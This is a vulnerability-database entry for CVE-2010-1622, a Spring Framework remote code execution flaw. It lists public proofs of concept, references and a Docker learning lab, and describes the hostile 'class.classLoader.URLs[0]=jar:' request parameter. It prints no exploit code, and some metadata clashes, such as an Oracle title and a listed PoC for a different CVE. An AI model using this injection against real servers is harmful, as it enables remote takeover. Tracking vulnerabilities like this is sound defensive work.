CVE-2010-1622

LAB

Oracle Fusion Middleware < 2.5.7 - Code Injection

Title source: rule
STIX 2.1

Exploitation Summary

EIP tracks 5 public exploits for CVE-2010-1622. PoCs published by Meder Kydyraliev, DDuarte, E-bounce.

AI-analyzed exploit summary The writeup describes CVE-2010-1622, a critical vulnerability in the Spring Framework allowing arbitrary code execution by manipulating the class loader's URLs via HTTP parameters. It outlines the attack steps, including crafting a malicious JAR and submitting a specially crafted HTTP request to exploit the vulnerability.

Description

SpringSource Spring Framework 2.5.x before 2.5.6.SEC02, 2.5.7 before 2.5.7.SR01, and 3.0.x before 3.0.3 allows remote attackers to execute arbitrary code via an HTTP request containing class.classLoader.URLs[0]=jar: followed by a URL of a crafted .jar file.

Exploits (5)

exploitdb WRITEUP VERIFIED
by Meder Kydyraliev · textwebappsmultiple
https://www.exploit-db.com/exploits/13918

The writeup describes CVE-2010-1622, a critical vulnerability in the Spring Framework allowing arbitrary code execution by manipulating the class loader's URLs via HTTP parameters. It outlines the attack steps, including crafting a malicious JAR and submitting a specially crafted HTTP request to exploit the vulnerability.

Classification
Writeup 90%
Attack Type
Rce
Complexity
Moderate
Reliability
Reliable
Target: Spring Framework 3.0.0 to 3.0.2, 2.5.0 to 2.5.6.SEC01 (community), 2.5.0 to 2.5.7 (subscription)
No auth needed
Prerequisites: Access to a Spring application running on a vulnerable version · Ability to host a malicious JAR on an attacker-controlled server
devstral-2 · analyzed Feb 16, 2026 Full analysis →
nomisec WORKING POC 19 stars
by DDuarte · poc
https://github.com/DDuarte/springshell-rce-poc

This repository contains a functional PoC for CVE-2022-22965, a Spring Framework RCE vulnerability. It includes a vulnerable Spring application and a Python script to exploit it by deploying a JSP webshell via malicious parameter binding.

Classification
Working Poc 100%
Attack Type
Rce
Complexity
Moderate
Reliability
Reliable
Target: Spring Framework (versions before 5.3.18 / 5.2.20)
No auth needed
Prerequisites: JDK 9 or above · Standalone Tomcat with WAR deployment · Writable file system (e.g., webapps/ROOT) · No WebDataBinder blocklist
devstral-2 · analyzed Feb 16, 2026 Full analysis →
nomisec WORKING POC 2 stars
by E-bounce · poc
https://github.com/E-bounce/cve-2010-1622_learning_environment

This repository provides a Dockerized learning environment for CVE-2010-1622, a vulnerability in Apache Tomcat 6.0.26. It includes a Spring MVC application with controllers that demonstrate the vulnerability, allowing users to interact with the environment to understand the exploit mechanics.

Classification
Working Poc 90%
Attack Type
Info Leak
Complexity
Moderate
Reliability
Reliable
Target: Apache Tomcat 6.0.26
No auth needed
Prerequisites: Docker · Java 8 · Maven
devstral-2 · analyzed Feb 18, 2026 Full analysis →
nomisec STUB
by HandsomeCat00 · poc
https://github.com/HandsomeCat00/Spring-CVE-2010-1622

The repository contains minimal Spring MVC code demonstrating a basic controller and POJO but lacks any exploit code or technical details related to CVE-2010-1622. No vulnerability demonstration or analysis is present.

Classification
Stub 90%
Attack Type
Other
Complexity
Trivial
Reliability
Theoretical
Target: Spring Framework (unspecified version)
No auth needed
Prerequisites: None specified
devstral-2 · analyzed Feb 18, 2026 Full analysis →

References (14)

Core 14
Core References
Third Party Advisory vdb-entry x_refsource_vupen
http://www.vupen.com/english/advisories/2011/0237
Exploit exploit x_refsource_exploit-db
http://www.exploit-db.com/exploits/13918
Third Party Advisory third-party-advisory x_refsource_secunia
http://secunia.com/advisories/43087
Exploit, Vendor Advisory x_refsource_confirm
http://www.springsource.com/security/cve-2010-1622
Third Party Advisory third-party-advisory x_refsource_secunia
http://secunia.com/advisories/41025
Vendor Advisory vendor-advisory x_refsource_redhat
http://www.redhat.com/support/errata/RHSA-2011-0175.html
Vendor Advisory x_refsource_confirm
http://geronimo.apache.org/22x-security-report.html
Third Party Advisory, VDB Entry vdb-entry x_refsource_bid
http://www.securityfocus.com/bid/40954
Third Party Advisory third-party-advisory x_refsource_secunia
http://secunia.com/advisories/41016
Third Party Advisory, VDB Entry vdb-entry x_refsource_sectrack
http://www.securitytracker.com/id/1033898
Vendor Advisory x_refsource_confirm
http://geronimo.apache.org/21x-security-report.html
Exploit mailing-list x_refsource_bugtraq
http://www.securityfocus.com/archive/1/511877

Scores

EPSS 0.0155
EPSS Percentile 81.9%

Lab Environment

COMMUNITY
Community Lab
docker pull tomcat:8.5-jdk11-openjdk-slim-buster
docker pull ebounce/cve_2010_1622_learning_env:latest
+1 more repos

Details

CWE
CWE-94
Status published
Products (15)
oracle/fusion_middleware 7.6.2
oracle/fusion_middleware 11.1.1.6.1
oracle/fusion_middleware 11.1.1.8.0
org.springframework/spring 2.5.0 - 2.5.7Maven
springsource/spring_framework 2.5.0
springsource/spring_framework 2.5.1
springsource/spring_framework 2.5.2
springsource/spring_framework 2.5.3
springsource/spring_framework 2.5.4
springsource/spring_framework 2.5.5
... and 5 more
Published Jun 21, 2010
Tracked Since Feb 18, 2026